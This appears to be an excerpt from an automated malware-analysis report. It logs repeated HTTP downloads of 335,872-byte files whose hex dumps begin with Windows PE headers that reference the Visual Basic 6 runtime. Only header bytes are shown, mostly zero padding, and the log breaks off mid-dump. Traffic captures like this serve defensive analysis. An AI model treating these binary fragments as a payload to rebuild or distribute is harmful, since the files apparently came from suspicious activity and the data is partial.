          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:51 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:51 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:52 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:52 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:52 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:53 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:53 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:53 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 